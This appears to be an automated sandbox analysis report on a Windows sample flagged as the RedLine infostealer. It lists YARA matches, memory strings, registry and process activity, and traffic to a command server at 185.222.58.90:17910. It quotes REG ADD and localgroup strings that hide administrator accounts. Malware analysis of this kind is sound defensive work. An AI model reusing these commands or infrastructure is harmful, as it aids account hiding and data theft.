                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://helpx.ad
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: api.ip.sb

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.2.RFQ - FYKS - 06052022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                        Source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                        Source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        .NET source code contains very large array initializations
                        Source: RFQ - FYKS - 06052022.exe, u0035457375725/u0035523505689.csLarge array initialization: 8203839234: array initializer size 398848
                        Source: 0.0.RFQ - FYKS - 06052022.exe.1300000.0.unpack, u0035457375725/u0035523505689.csLarge array initialization: 8203839234: array initializer size 398848
                        Source: 0.2.RFQ - FYKS - 06052022.exe.1300000.0.unpack, u0035457375725/u0035523505689.csLarge array initialization: 8203839234: array initializer size 398848
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.5.unpack, u0035457375725/u0035523505689.csLarge array initialization: 8203839234: array initializer size 398848
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.1.unpack, u0035457375725/u0035523505689.csLarge array initialization: 8203839234: array initializer size 398848
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.3.unpack, u0035457375725/u0035523505689.csLarge array initialization: 8203839234: array initializer size 398848
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.2.unpack, u0035457375725/u0035523505689.csLarge array initialization: 8203839234: array initializer size 398848
                        Source: RFQ - FYKS - 06052022.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.2.RFQ - FYKS - 06052022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                        Source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                        Source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_01364E140_2_01364E14
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_00C204900_2_00C20490
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_00C276A00_2_00C276A0
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_00C29A780_2_00C29A78
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_00C2DB880_2_00C2DB88
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_00C25EE80_2_00C25EE8
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_00C204600_2_00C20460
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_00C227480_2_00C22748
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_00C2F9980_2_00C2F998
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_00C29F800_2_00C29F80
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_012541E70_2_012541E7
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_012553B00_2_012553B0
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_012522400_2_01252240
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_012514E80_2_012514E8
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_012506800_2_01250680
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_01255E880_2_01255E88
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_01364E141_2_01364E14
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_0186FA301_2_0186FA30
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_0186DE101_2_0186DE10
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_0186D2F01_2_0186D2F0
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_057221D81_2_057221D8
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_05721D981_2_05721D98
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_0572BE801_2_0572BE80
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_057268F81_2_057268F8
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_057226101_2_05722610
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_057201901_2_05720190
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_057877381_2_05787738
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_0578772B1_2_0578772B
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_057863801_2_05786380
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_057842881_2_05784288
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.268149174.0000000002A6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRHMh NgD.exe2 vs RFQ - FYKS - 06052022.exe
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRHMh NgD.exe2 vs RFQ - FYKS - 06052022.exe
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000000.239780256.0000000001398000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMicrosoft.ServiceHub.HostStub.dll\ vs RFQ - FYKS - 06052022.exe
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRHMh NgD.exe2 vs RFQ - FYKS - 06052022.exe
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278120947.00000000038B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZakrytyeKupla.exe< vs RFQ - FYKS - 06052022.exe
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000000.254671396.0000000001398000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMicrosoft.ServiceHub.HostStub.dll\ vs RFQ - FYKS - 06052022.exe
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362669805.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs RFQ - FYKS - 06052022.exe
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRHMh NgD.exe2 vs RFQ - FYKS - 06052022.exe
                        Source: RFQ - FYKS - 06052022.exeBinary or memory string: OriginalFilenameMicrosoft.ServiceHub.HostStub.dll\ vs RFQ - FYKS - 06052022.exe
                        Source: RFQ - FYKS - 06052022.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: RFQ - FYKS - 06052022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: RFQ - FYKS - 06052022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe "C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe"
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess created: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess created: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ - FYKS - 06052022.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1F80.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@4/27@2/1
                        Source: RFQ - FYKS - 06052022.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_01
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: RFQ - FYKS - 06052022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: RFQ - FYKS - 06052022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                        Source: RFQ - FYKS - 06052022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: E:\A\_work\140\s\obj\Microsoft.ServiceHub.HostStub\Release\net472\Microsoft.ServiceHub.HostStub.pdb source: RFQ - FYKS - 06052022.exe
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 0_2_00C2CA98 push eax; ret 0_2_00C2CA99
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_0572D880 push edi; iretd 1_2_0572D886
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_0578B5C0 push cs; ret 1_2_0578B5F4
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_057887C3 push eax; iretd 1_2_057887C9
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_0578E1F0 pushad ; retf 1_2_0578E1F1
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_0578E1F3 push eax; retf 1_2_0578E1F9
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeCode function: 1_2_05787393 push esp; ret 1_2_05787399
                        Source: RFQ - FYKS - 06052022.exeStatic PE information: 0x83941809 [Thu Dec 15 00:12:57 2039 UTC]
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.76901359881

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Icon mismatch, binary includes an icon from a different legit application in order to fool users
                        Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (67).png
                        Contains functionality to hide user accounts
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: localgroup administrators aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                        Uses known network protocols on non-standard ports
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49752
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
